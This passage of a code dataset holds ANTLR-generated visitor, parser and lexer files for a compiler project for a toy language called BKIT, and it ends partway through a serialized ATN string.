visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitSubexpr(BKITParser.SubexprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitOperand(BKITParser.OperandContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitIds_list(BKITParser.Ids_listContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitPrimitive_type(BKITParser.Primitive_typeContext ctx) { return visitChildren(ctx); }\n}" }, { "alpha_fraction": 0.5331836938858032, "alphanum_fraction": 0.5685421824455261, "avg_line_length": 30.513275146484375, "blob_id": "b1f1eae1623299a6c2b1838ce3eb5681b0495fd8", "content_id": "dbf6742aac2c1f2708fd1d21816790295c1c4cf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7127, "license_type": "no_license", "max_line_length": 103, "num_lines": 226, "path": "/LexicalAnalysis/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\21\")\n buf.write(\"\\25\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\")\n buf.write(\"\\3\\3\\4\\6\\4\\21\\n\\4\\r\\4\\16\\4\\22\\3\\4\\2\\2\\5\\2\\4\\6\\2\\3\\3\\2\")\n buf.write(\"\\4\\5\\2\\22\\2\\b\\3\\2\\2\\2\\4\\13\\3\\2\\2\\2\\6\\20\\3\\2\\2\\2\\b\\t\\7\")\n buf.write(\"\\13\\2\\2\\t\\n\\7\\2\\2\\3\\n\\3\\3\\2\\2\\2\\13\\f\\7\\13\\2\\2\\f\\r\\7\\6\")\n buf.write(\"\\2\\2\\r\\16\\7\\b\\2\\2\\16\\5\\3\\2\\2\\2\\17\\21\\t\\2\\2\\2\\20\\17\\3\\2\")\n buf.write(\"\\2\\2\\21\\22\\3\\2\\2\\2\\22\\20\\3\\2\\2\\2\\22\\23\\3\\2\\2\\2\\23\\7\\3\")\n buf.write(\"\\2\\2\\2\\3\\22\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"':'\", \"';'\", \"'.'\", \"','\", \"'Var'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"STRING\", \"Real_number\", \"Integer_number\", \n \"Ids_list\", \"COLON\", \"SEMI\", \"DOT\", \"COMMA\", \"VAR\", \n \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \"ERROR_CHAR\", \n \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n RULE_program = 0\n RULE_var_declaration = 1\n RULE_number = 2\n\n ruleNames = [ \"program\", \"var_declaration\", \"number\" ]\n\n EOF = Token.EOF\n STRING=1\n Real_number=2\n Integer_number=3\n Ids_list=4\n COLON=5\n SEMI=6\n DOT=7\n COMMA=8\n VAR=9\n ILLEGAL_ESCAPE=10\n WS=11\n UNCLOSE_STRING=12\n ERROR_CHAR=13\n BLOCK_COMMENT=14\n UNTERMINATED_COMMENT=15\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 6\n self.match(BKITParser.VAR)\n self.state = 7\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declarationContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def Ids_list(self):\n return self.getToken(BKITParser.Ids_list, 0)\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declaration\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declaration\" ):\n return visitor.visitVar_declaration(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declaration(self):\n\n localctx = BKITParser.Var_declarationContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declaration)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 9\n self.match(BKITParser.VAR)\n self.state = 10\n self.match(BKITParser.Ids_list)\n self.state = 11\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class NumberContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Real_number(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.Real_number)\n else:\n return self.getToken(BKITParser.Real_number, i)\n\n def Integer_number(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.Integer_number)\n else:\n return self.getToken(BKITParser.Integer_number, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_number\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitNumber\" ):\n return visitor.visitNumber(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def number(self):\n\n localctx = BKITParser.NumberContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_number)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 14 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 13\n _la = self._input.LA(1)\n if not(_la==BKITParser.Real_number or _la==BKITParser.Integer_number):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 16 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.Real_number or _la==BKITParser.Integer_number):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.30758678913116455, "alphanum_fraction": 0.6180588603019714, "avg_line_length": 57.24517822265625, "blob_id": "a76a8a0b5655358499f91f01d2289d398fdcccaf", "content_id": "50c57ea92ba84bed024b7365bfbc23213704fea7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 21142, "license_type": "no_license", "max_line_length": 97, "num_lines": 363, "path": "/LexicalAnalysis/BKITLexer.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from BKIT.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.Lexer;\nimport org.antlr.v4.runtime.CharStream;\nimport org.antlr.v4.runtime.Token;\nimport org.antlr.v4.runtime.TokenStream;\nimport org.antlr.v4.runtime.*;\nimport org.antlr.v4.runtime.atn.*;\nimport org.antlr.v4.runtime.dfa.DFA;\nimport org.antlr.v4.runtime.misc.*;\n\n@SuppressWarnings({\"all\", \"warnings\", \"unchecked\", \"unused\", \"cast\"})\npublic class BKITLexer extends Lexer {\n\tstatic { RuntimeMetaData.checkVersion(\"4.8\", RuntimeMetaData.VERSION); }\n\n\tprotected static final DFA[] _decisionToDFA;\n\tprotected static final PredictionContextCache _sharedContextCache =\n\t\tnew PredictionContextCache();\n\tpublic static final int\n\t\tREAL_NUMBER=1, ID=2, ILLEGAL_ESCAPE=3, UNCLOSE_STRING=4, COMMENT=5, UNTERMINATED_COMMENT=6, \n\t\tERROR_CHAR=7, WS=8, Integer_literal=9, Float_literal=10, Boolean_literal=11, \n\t\tString_literal=12, BODY=13, BREAK=14, CONTINUE=15, DO=16, ELSE=17, ELSELF=18, \n\t\tELSEIF=19, ENDBODY=20, ENDFOR=21, ENDWHILE=22, FOR=23, FUNCTION=24, IF=25, \n\t\tPARAMETER=26, RETURN=27, THEN=28, VAR=29, WHILE=30, TRUE=31, FALSE=32, \n\t\tENDDO=33, PLUS_INT=34, PLUS_FLOAT=35, MINUS_INT=36, MINUS_FLOAT=37, STAR_INT=38, \n\t\tSTAR_FLOAT=39, DIV_INT=40, DIV_FLOAT=41, MOD=42, NOT=43, AND=44, OR=45, \n\t\tEQUAL=46, NOT_EQUAL_INT=47, LESS_INT=48, GREATER_INT=49, LESS_OR_EQUAL_INT=50, \n\t\tGREATER_OR_EQUAL_INT=51, NOT_EQUAL_FLOAT=52, LESS_FLOAT=53, GREATER_FLOAT=54, \n\t\tLESS_OR_EQUAL_FLOAT=55, GREATER_OR_EQUAL_FLOAT=56, LEFT_PAREN=57, RIGHT_PARENT=58, \n\t\tLEFT_BRACKET=59, RIGHT_BRACKET=60, LEFT_BRACE=61, RIGHT_BRACE=62, COLON=63, \n\t\tDOT=64, SEMI=65, COMMA=66;\n\tpublic static String[] channelNames = {\n\t\t\"DEFAULT_TOKEN_CHANNEL\", \"HIDDEN\"\n\t};\n\n\tpublic static String[] modeNames = {\n\t\t\"DEFAULT_MODE\"\n\t};\n\n\tprivate static String[] makeRuleNames() {\n\t\treturn new String[] {\n\t\t\t\"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n\t\t\t\"ERROR_CHAR\", \"WS\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \n\t\t\t\"LETTER\", \"SIGN\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n\t\t\t\"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \"STRING_CHAR\", \n\t\t\t\"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \"DECIMAL\", \"OCTAL\", \n\t\t\t\"DOUBLE_QUOTE\", \"Integer_literal\", \"Float_literal\", \"Boolean_literal\", \n\t\t\t\"String_literal\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \n\t\t\t\"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n\t\t\t\"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \n\t\t\t\"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \n\t\t\t\"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n\t\t\t\"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \n\t\t\t\"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \n\t\t\t\"LEFT_PAREN\", \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n\t\t\t\"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\"\n\t\t};\n\t}\n\tpublic static final String[] ruleNames = makeRuleNames();\n\n\tprivate static String[] makeLiteralNames() {\n\t\treturn new String[] {\n\t\t\tnull, null, null, null, null, null, null, null, null, null, null, null, \n\t\t\tnull, \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n\t\t\t\"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n\t\t\t\"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \n\t\t\t\"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \n\t\t\t\"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \n\t\t\t\"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \n\t\t\t\"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\"\n\t\t};\n\t}\n\tprivate static final String[] _LITERAL_NAMES = makeLiteralNames();\n\tprivate static String[] makeSymbolicNames() {\n\t\treturn new String[] {\n\t\t\tnull, \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n\t\t\t\"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \n\t\t\t\"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \n\t\t\t\"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \n\t\t\t\"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n\t\t\t\"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n\t\t\t\"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n\t\t\t\"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n\t\t\t\"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \n\t\t\t\"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \"RIGHT_PARENT\", \"LEFT_BRACKET\", \n\t\t\t\"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \n\t\t\t\"COMMA\"\n\t\t};\n\t}\n\tprivate static final String[] _SYMBOLIC_NAMES = makeSymbolicNames();\n\tpublic static final Vocabulary VOCABULARY = new VocabularyImpl(_LITERAL_NAMES, _SYMBOLIC_NAMES);\n\n\t/**\n\t * @deprecated Use {@link #VOCABULARY} instead.\n\t */\n\t@Deprecated\n\tpublic static final String[] tokenNames;\n\tstatic {\n\t\ttokenNames = new String[_SYMBOLIC_NAMES.length];\n\t\tfor (int i = 0; i < tokenNames.length; i++) {\n\t\t\ttokenNames[i] = VOCABULARY.getLiteralName(i);\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = VOCABULARY.getSymbolicName(i);\n\t\t\t}\n\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = \"<INVALID>\";\n\t\t\t}\n\t\t}\n\t}\n\n\t@Override\n\t@Deprecated\n\tpublic String[] getTokenNames() {\n\t\treturn tokenNames;\n\t}\n\n\t@Override\n\n\tpublic Vocabulary getVocabulary() {\n\t\treturn VOCABULARY;\n\t}\n\n\n\tpublic BKITLexer(CharStream input) {\n\t\tsuper(input);\n\t\t_interp = new LexerATNSimulator(this,_ATN,_decisionToDFA,_sharedContextCache);\n\t}\n\n\t@Override\n\tpublic String getGrammarFileName() { return \"BKIT.g4\"; }\n\n\t@Override\n\tpublic String[] getRuleNames() { return ruleNames; }\n\n\t@Override\n\tpublic String getSerializedATN() { return _serializedATN; }\n\n\t@Override\n\tpublic String[] getChannelNames() { return channelNames; }\n\n\t@Override\n\tpublic String[] getModeNames() { return modeNames; }\n\n\t@Override\n\tpublic ATN getATN() { return _ATN; }\n\n\t@Override\n\tpublic void action(RuleContext _localctx, int ruleIndex, int actionIndex) {\n\t\tswitch (ruleIndex) {\n\t\tcase 29:\n\t\t\tString_literal_action((RuleContext)_localctx, actionIndex);\n\t\t\tbreak;\n\t\t}\n\t}\n\tprivate void String_literal_action(RuleContext _localctx, int actionIndex) {\n\t\tswitch (actionIndex) {\n\t\tcase 0:\n\n\t\t\t\t\tString s = this.text;\n\t\t\t\t\tthis.text = \"123123\";\t\n\t\t\t\t\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tpublic static final String _serializedATN =\n\t\t\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2D\\u022b\\b\\1\\4\\2\\t\"+\n\t\t\"\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\"+\n\t\t\"\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\"+\n\t\t\"\\4\\23\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\\t\\31\"+\n\t\t\"\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\"+\n\t\t\"\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4\"+\n\t\t\",\\t,\\4-\\t-\\4.\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\\t\"+\n\t\t\"\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\\4;\\t;\\4<\\t<\\4=\\t=\"+\n\t\t\"\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\tC\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\"+\n\t\t\"\\tI\\4J\\tJ\\4K\\tK\\4L\\tL\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\"+\n\t\t\"\\4U\\tU\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\7\\3\\u00b2\\n\\3\\f\\3\\16\\3\\u00b5\\13\\3\\3\\4\\3\"+\n\t\t\"\\4\\7\\4\\u00b9\\n\\4\\f\\4\\16\\4\\u00bc\\13\\4\\3\\4\\3\\4\\3\\5\\3\\5\\7\\5\\u00c2\\n\\5\\f\\5\"+\n\t\t\"\\16\\5\\u00c5\\13\\5\\3\\5\\5\\5\\u00c8\\n\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u00ce\\n\\6\\f\\6\\16\"+\n\t\t\"\\6\\u00d1\\13\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00dc\\n\\7\\f\\7\\16\"+\n\t\t\"\\7\\u00df\\13\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\6\\t\\u00e6\\n\\t\\r\\t\\16\\t\\u00e7\\3\\t\\3\\t\"+\n\t\t\"\\3\\n\\3\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\\r\\3\\r\\5\\r\\u00f4\\n\\r\\3\\16\\5\\16\\u00f7\\n\\16\"+\n\t\t\"\\3\\17\\3\\17\\3\\17\\6\\17\\u00fc\\n\\17\\r\\17\\16\\17\\u00fd\\3\\20\\3\\20\\7\\20\\u0102\"+\n\t\t\"\\n\\20\\f\\20\\16\\20\\u0105\\13\\20\\3\\21\\6\\21\\u0108\\n\\21\\r\\21\\16\\21\\u0109\\3\\21\"+\n\t\t\"\\3\\21\\5\\21\\u010e\\n\\21\\3\\21\\5\\21\\u0111\\n\\21\\3\\22\\3\\22\\3\\22\\3\\23\\3\\23\\3\"+\n\t\t\"\\23\\3\\24\\3\\24\\3\\24\\3\\25\\3\\25\\3\\25\\5\\25\\u011f\\n\\25\\3\\26\\3\\26\\3\\27\\3\\27\"+\n\t\t\"\\3\\30\\3\\30\\3\\30\\3\\30\\5\\30\\u0129\\n\\30\\3\\30\\6\\30\\u012c\\n\\30\\r\\30\\16\\30\\u012d\"+\n\t\t\"\\3\\31\\6\\31\\u0131\\n\\31\\r\\31\\16\\31\\u0132\\3\\32\\3\\32\\3\\32\\3\\32\\5\\32\\u0139\"+\n\t\t\"\\n\\32\\3\\32\\6\\32\\u013c\\n\\32\\r\\32\\16\\32\\u013d\\3\\33\\3\\33\\3\\34\\3\\34\\3\\34\\5\"+\n\t\t\"\\34\\u0145\\n\\34\\3\\35\\3\\35\\3\\36\\3\\36\\5\\36\\u014b\\n\\36\\3\\37\\3\\37\\7\\37\\u014f\"+\n\t\t\"\\n\\37\\f\\37\\16\\37\\u0152\\13\\37\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\3!\\3!\\3!\\3\"+\n\t\t\"!\\3!\\3!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3#\\3#\\3#\\3$\\3$\\3$\\3$\\3$\\3\"+\n\t\t\"%\\3%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3(\\3\"+\n\t\t\"(\\3(\\3(\\3(\\3(\\3(\\3)\\3)\\3)\\3)\\3)\\3)\\3)\\3)\\3)\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3+\\3\"+\n\t\t\"+\\3+\\3+\\3+\\3+\\3,\\3,\\3,\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3.\\3.\\3.\\3.\\3.\\3\"+\n\t\t\".\\3.\\3/\\3/\\3/\\3/\\3/\\3\\60\\3\\60\\3\\60\\3\\60\\3\\61\\3\\61\\3\\61\\3\\61\\3\\61\\3\\61\"+\n\t\t\"\\3\\62\\3\\62\\3\\62\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\\3\\63\\3\\63\\3\\63\\3\\64\\3\\64\\3\\64\"+\n\t\t\"\\3\\64\\3\\64\\3\\64\\3\\65\\3\\65\\3\\66\\3\\66\\3\\66\\3\\67\\3\\67\\38\\38\\38\\39\\39\\3:\\3\"+\n\t\t\":\\3:\\3;\\3;\\3<\\3<\\3<\\3=\\3=\\3>\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3A\\3A\\3B\\3B\\3B\\3\"+\n\t\t\"C\\3C\\3D\\3D\\3E\\3E\\3E\\3F\\3F\\3F\\3G\\3G\\3G\\3G\\3H\\3H\\3H\\3I\\3I\\3I\\3J\\3J\\3J\\3\"+\n\t\t\"J\\3K\\3K\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3O\\3O\\3P\\3P\\3Q\\3Q\\3R\\3R\\3S\\3S\\3T\\3T\\3\"+\n\t\t\"U\\3U\\4\\u00cf\\u00dd\\2V\\3\\3\\5\\4\\7\\5\\t\\6\\13\\7\\r\\b\\17\\t\\21\\n\\23\\2\\25\\2\\27\"+\n\t\t\"\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\2\\63\\2\\65\\2\\67\\139\"+\n\t\t\"\\f;\\r=\\16?\\17A\\20C\\21E\\22G\\23I\\24K\\25M\\26O\\27Q\\30S\\31U\\32W\\33Y\\34[\\35\"+\n\t\t\"]\\36_\\37a c!e\\\"g#i$k%m&o\\'q(s)u*w+y,{-}.\\177/\\u0081\\60\\u0083\\61\\u0085\"+\n\t\t\"\\62\\u0087\\63\\u0089\\64\\u008b\\65\\u008d\\66\\u008f\\67\\u00918\\u00939\\u0095:\"+\n\t\t\"\\u0097;\\u0099<\\u009b=\\u009d>\\u009f?\\u00a1@\\u00a3A\\u00a5B\\u00a7C\\u00a9\"+\n\t\t\"D\\3\\2\\17\\4\\3\\n\\f\\16\\17\\4\\2\\60\\60AA\\5\\2\\13\\f\\16\\17\\\"\\\"\\3\\2c|\\3\\2C\\\\\\3\\2\"+\n\t\t\"\\62;\\4\\2--//\\4\\2GGgg\\3\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\\17$$))^^\\5\"+\n\t\t\"\\2\\62;CHch\\3\\2\\629\\2\\u0231\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\"+\n\t\t\"\\2\\2\\2\\13\\3\\2\\2\\2\\2\\r\\3\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\\21\\3\\2\\2\\2\\2\\67\\3\\2\\2\\2\\2\"+\n\t\t\"9\\3\\2\\2\\2\\2;\\3\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\"+\n\t\t\"\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2O\\3\\2\\2\\2\\2Q\\3\\2\\2\"+\n\t\t\"\\2\\2S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\\2Y\\3\\2\\2\\2\\2[\\3\\2\\2\\2\\2]\\3\\2\\2\\2\\2\"+\n\t\t\"_\\3\\2\\2\\2\\2a\\3\\2\\2\\2\\2c\\3\\2\\2\\2\\2e\\3\\2\\2\\2\\2g\\3\\2\\2\\2\\2i\\3\\2\\2\\2\\2k\\3\"+\n\t\t\"\\2\\2\\2\\2m\\3\\2\\2\\2\\2o\\3\\2\\2\\2\\2q\\3\\2\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\\2\\2\\2\\2w\\3\\2\\2\"+\n\t\t\"\\2\\2y\\3\\2\\2\\2\\2{\\3\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\\3\\2\\2\\2\\2\\u0081\\3\\2\\2\\2\\2\\u0083\"+\n\t\t\"\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\\2\\2\\u0087\\3\\2\\2\\2\\2\\u0089\\3\\2\\2\\2\\2\\u008b\\3\\2\\2\"+\n\t\t\"\\2\\2\\u008d\\3\\2\\2\\2\\2\\u008f\\3\\2\\2\\2\\2\\u0091\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\\2\\2\\u0095\"+\n\t\t\"\\3\\2\\2\\2\\2\\u0097\\3\\2\\2\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\\3\\2\\2\\2\\2\\u009d\\3\\2\\2\"+\n\t\t\"\\2\\2\\u009f\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\\2\\2\\u00a3\\3\\2\\2\\2\\2\\u00a5\\3\\2\\2\\2\\2\\u00a7\"+\n\t\t\"\\3\\2\\2\\2\\2\\u00a9\\3\\2\\2\\2\\3\\u00ab\\3\\2\\2\\2\\5\\u00ae\\3\\2\\2\\2\\7\\u00b6\\3\\2\\2\"+\n\t\t\"\\2\\t\\u00bf\\3\\2\\2\\2\\13\\u00c9\\3\\2\\2\\2\\r\\u00d7\\3\\2\\2\\2\\17\\u00e2\\3\\2\\2\\2\\21\"+\n\t\t